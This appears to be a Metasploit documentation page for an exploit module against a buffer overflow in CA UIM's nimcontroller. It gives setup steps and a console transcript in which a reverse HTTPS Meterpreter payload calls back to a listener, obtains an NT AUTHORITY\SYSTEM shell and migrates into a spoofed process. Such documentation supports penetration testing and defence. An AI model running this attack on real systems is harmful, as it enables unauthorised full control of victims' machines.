adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9beec65ef34c4e90a00a41ee1c8de0f9e6effd2a
metasploit-gs/documentation/modules/exploit/windows/nimsoft/nimcontroller_bof.md
T
Spencer McIntyre 2fb89f47c2 Apply suggestions from msftidy_docs for nimcontroller_bof
2020-07-31 09:08:13 -04:00

114 lines
4.4 KiB
Markdown
Raw Blame History

## Vulnerable Application
All CA Infrastructure Management monitoring agents prior to 9.20 are vulnerable to a buffer overflow vulnerability
within the nimcontroller when using the directory_list probe. Since the directory_list probe requires read privileges
the target host must also be vulnerable to CVE-2020-8010 to bypass ACL settings. Successful code execution will result
in a NT AUTHORITY\SYSTEM shell, even if exploitation fails the remote service will not crash. You should be able to
exploit the service an unlimited amount of times.
## Verification Steps
1. Install the CA UIM v7.80.3132 (nimsoftrobotXXX.exe)
2. Start `msfconsole`
3. Do `use exploit/windows/nimsoft/nimcontroller_bof`
4. Do `set RHOSTS <ip>`
5. Do `exploit`
6. Verify shell is opened and service is still accessible
### Links
[CA UIM](https://techdocs.broadcom.com/content/broadcom/techdocs/us/en/ca-enterprise-software/it-operations-management/unified-infrastructure-management/9-0-2/getting-started/ca-uim-overview.html)
[Nimsoft Probe Utility](https://techdocs.broadcom.com/content/broadcom/techdocs/us/en/ca-enterprise-software/it-operations-management/unified-infrastructure-management/9-0-2/administering/run-probe-commands-from-a-command-prompt.html)
## Options
## Scenarios
### Windows 10 x64
```
msf5 exploit(windows/nimsoft/nimcontroller_bof) > options
Module options (exploit/windows/nimsoft/nimcontroller_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
DIRECTORY C:\ no Directory path to obtain a listing
RHOSTS W.X.Y.Z yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 48000 yes The target port (TCP)
Payload options (windows/x64/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST A.B.C.D yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 Windows Universal (x64) - v7.80.3132
msf5 exploit(windows/nimsoft/nimcontroller_bof) > exploit
[*] Started HTTPS reverse handler on https://A.B.C.D:8443
[*] W.X.Y.Z:48000 - Executing automatic check (disable AutoCheck to override)
[*] https://A.B.C.D:8443 handling request from W.X.Y.Z; (UUID: rpsri4cm) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (A.B.C.D:8443 -> W.X.Y.Z:50980) at 2020-07-21 11:14:09 -0500
[*] W.X.Y.Z:48000 - Version 7.80 [Build 7.80.3132, Jun 1 2015] detected, sending directory_list probe
Directory of C:\
12/15/2019 06:24 PM <DIR> $GetCurrent
12/14/2019 01:41 AM <DIR> $Recycle.Bin
10/18/2019 05:55 PM <DIR> Documents and Settings
07/21/2020 10:15 AM <DIR> pagefile.sys
07/14/2020 03:41 PM <DIR> PerfLogs
06/10/2020 09:18 AM <DIR> Program Files
07/19/2020 01:37 PM <DIR> Program Files (x86)
07/14/2020 03:41 PM <DIR> ProgramData
12/15/2019 07:08 PM <DIR> Recovery
07/21/2020 10:15 AM <DIR> swapfile.sys
10/18/2019 04:04 PM <DIR> System Volume Information
12/15/2019 07:09 PM <DIR> Users
07/18/2020 02:20 PM <DIR> Windows
[+] W.X.Y.Z:48000 - The target is vulnerable.
meterpreter >
[*] Session ID 1 (A.B.C.D:8443 -> W.X.Y.Z:50980) processing AutoRunScript 'post/windows/manage/migrate'
[*] Running module against DESKTOP-JICNNRT
[*] Current server process: notepad.exe (1860)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 7472
[+] Successfully migrated into process 7472
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/nimsoft/nimcontroller_bof) > set DIRECTORY C:\\Users\\
DIRECTORY => C:\Users\
msf5 exploit(windows/nimsoft/nimcontroller_bof) > check
[*] W.X.Y.Z:48000 - Version 7.80 [Build 7.80.3132, Jun 1 2015] detected, sending directory_list probe
Directory of C:\Users\
03/19/2019 12:02 AM <DIR> All Users
12/15/2019 07:14 PM <DIR> Default
03/19/2019 12:02 AM <DIR> Default User
03/18/2019 11:49 PM <DIR> desktop.ini
07/19/2020 01:37 PM <DIR> REDACTED
12/15/2019 09:07 PM <DIR> Public
[+] W.X.Y.Z:48000 - The target is vulnerable.
```
Reference in New Issue View Git Blame Copy Permalink